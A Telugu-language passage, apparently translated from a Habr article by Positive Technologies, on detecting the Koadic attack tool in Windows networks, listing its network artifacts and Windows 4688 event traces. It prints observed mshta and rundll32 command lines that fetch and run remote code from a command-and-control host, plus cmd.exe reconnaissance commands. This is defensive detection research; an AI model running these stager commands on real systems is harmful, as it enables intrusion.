కోడిక్‌లో రిమోట్‌గా ఆదేశాలను అమలు చేయగల మాడ్యూల్స్ కూడా ఉన్నాయి. ఇక్కడ మనం అదే URI జనరేషన్ పద్ధతిని మరియు సుపరిచితమైన sid మరియు csrf వేరియబుల్స్‌ని చూస్తాము. exec_cmd మాడ్యూల్ విషయంలో, షెల్ ఆదేశాలను అమలు చేయగల సామర్థ్యం ఉన్న శరీరానికి కోడ్ జోడించబడుతుంది. CnC సర్వర్ యొక్క HTTP ప్రతిస్పందనలో ఉన్న అటువంటి కోడ్ క్రింద చూపబడింది.

విండోస్ ఇన్‌ఫ్రాస్ట్రక్చర్‌పై దాడులను ఎలా గుర్తించాలి: హ్యాకర్ సాధనాలను అధ్యయనం చేయడం
అన్నం. 14. ఇంప్లాంట్ కోడ్ exec_cmd

కోడ్ అమలు కోసం తెలిసిన WS లక్షణంతో GAWTUUGCFI వేరియబుల్ అవసరం. దాని సహాయంతో, ఇంప్లాంట్ షెల్‌ను పిలుస్తుంది, కోడ్ యొక్క రెండు శాఖలను ప్రాసెస్ చేస్తుంది - shell.exec అవుట్‌పుట్ డేటా స్ట్రీమ్ యొక్క రిటర్న్‌తో మరియు తిరిగి రాకుండా shell.run.

కోడిక్ అనేది ఒక సాధారణ సాధనం కాదు, కానీ ఇది చట్టబద్ధమైన ట్రాఫిక్‌లో కనుగొనబడే దాని స్వంత కళాఖండాలను కలిగి ఉంది:

  • HTTP అభ్యర్థనల ప్రత్యేక నిర్మాణం,
  • winHttpRequests APIని ఉపయోగించడం,
  • ActiveXObject ద్వారా WScript.Shell వస్తువును సృష్టించడం,
  • పెద్ద ఎక్జిక్యూటబుల్ బాడీ.

ప్రారంభ కనెక్షన్ స్టేజర్ ద్వారా ప్రారంభించబడింది, కాబట్టి Windows ఈవెంట్‌ల ద్వారా దాని కార్యాచరణను గుర్తించడం సాధ్యమవుతుంది. mshta కోసం, ఇది ఈవెంట్ 4688, ఇది ప్రారంభ లక్షణంతో ప్రక్రియ యొక్క సృష్టిని సూచిస్తుంది:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

కోడిక్ రన్ అవుతున్నప్పుడు, మీరు ఇతర 4688 ఈవెంట్‌లను సంపూర్ణంగా వర్ణించే లక్షణాలతో చూడవచ్చు:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

కనుగొన్న

ల్యాండ్ ట్రెండ్‌పై జీవించడం నేరస్థులలో ఆదరణ పొందుతోంది. వారు తమ అవసరాల కోసం విండోస్‌లో నిర్మించిన టూల్స్ మరియు మెకానిజమ్‌లను ఉపయోగిస్తారు. ఈ సూత్రాన్ని అనుసరించే ప్రసిద్ధ సాధనాలు Koadic, CrackMapExec మరియు Impacket APT నివేదికలలో ఎక్కువగా కనిపించడాన్ని మేము చూస్తున్నాము. ఈ సాధనాల కోసం గిట్‌హబ్‌లోని ఫోర్క్‌ల సంఖ్య కూడా పెరుగుతోంది మరియు కొత్తవి కనిపిస్తున్నాయి (ఇప్పటికే వాటిలో వెయ్యి ఉన్నాయి). ట్రెండ్ దాని సరళత కారణంగా జనాదరణ పొందుతోంది: దాడి చేసేవారికి మూడవ పక్ష సాధనాలు అవసరం లేదు; వారు ఇప్పటికే బాధితుల మెషీన్‌లలో ఉన్నారు మరియు భద్రతా చర్యలను దాటవేయడంలో వారికి సహాయపడతారు. మేము నెట్‌వర్క్ కమ్యూనికేషన్‌ను అధ్యయనం చేయడంపై దృష్టి పెడతాము: పైన వివరించిన ప్రతి సాధనం నెట్‌వర్క్ ట్రాఫిక్‌లో దాని స్వంత జాడలను వదిలివేస్తుంది; వాటి యొక్క వివరణాత్మక అధ్యయనం మా ఉత్పత్తిని బోధించడానికి మాకు అనుమతినిచ్చింది PT నెట్‌వర్క్ అటాక్ డిస్కవరీ వాటిని గుర్తించండి, ఇది అంతిమంగా వారికి సంబంధించిన మొత్తం సైబర్ సంఘటనల గొలుసును పరిశోధించడానికి సహాయపడుతుంది.

రచయితలు:

  • అంటోన్ ట్యూరిన్, నిపుణుల సేవల విభాగం అధిపతి, PT నిపుణుల భద్రతా కేంద్రం, సానుకూల సాంకేతికతలు
  • Egor Podmokov, నిపుణుడు, PT నిపుణుల భద్రతా కేంద్రం, సానుకూల సాంకేతికతలు

మూలం: www.habr.com

ఒక వ్యాఖ్యను జోడించండి